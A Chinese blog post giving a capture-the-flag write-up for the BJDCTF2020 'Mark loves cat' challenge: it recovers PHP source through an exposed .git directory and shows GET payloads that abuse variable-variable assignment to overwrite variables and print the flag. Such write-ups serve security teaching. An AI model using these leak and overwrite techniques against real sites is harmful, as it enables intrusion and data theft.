0
点赞
收藏
分享

微信扫一扫

[BJDCTF2020]Mark loves cat1

西曲风 2024-08-09 阅读 54
gulppostman

打开题目

发现这么多链接,以为要一点点去找功能上的漏洞。当你源代码,dirsearch,抓包等等操作之后,发现什么都没有。所以这题又是一道源码泄露题,上GItHack。扫描结果如下

http://63f29a80-e08b-43ae-a6d0-8e70fb02eaa3.node5.buuoj.cn:81/.git

主要代码在index里面

<?php
 
include 'flag.php';
 
$yds = "dog";
$is = "cat";
$handsome = 'yds';
 
foreach($_POST as $x => $y){
    $$x = $y;   //$flag=1
}
 
foreach($_GET as $x => $y){
    $$x = $$y;   
}
 
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
 
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}
 
if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}
 
echo "the flag is: ".$flag;

根据源代码,需要通过get传参达到变量覆盖的目的。 

?yds=flag

覆盖is变量

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

Get或Post传入flag=flag,触发变量覆盖代码

foreach($_POST as $x => $y){
    $$x = $y;   //$flag=1
}
 
foreach($_GET as $x => $y){
    $$x = $$y;   
}

输出?is=flag&flag=flag

再覆盖覆盖handsome变量

handsome=flag,得到$handsome=$flag

?handsome=flag&flag=handsome

可以得到flag

举报

相关推荐

Mark loves cat

BJDctf2020 Ezphp

[BJDCTF2020]纳尼1

[BJDCTF2020]EzPHP

[BJDCTF2020]ZJCTF,不过如此1

buu-[BJDCTF2020]JustRE

0 条评论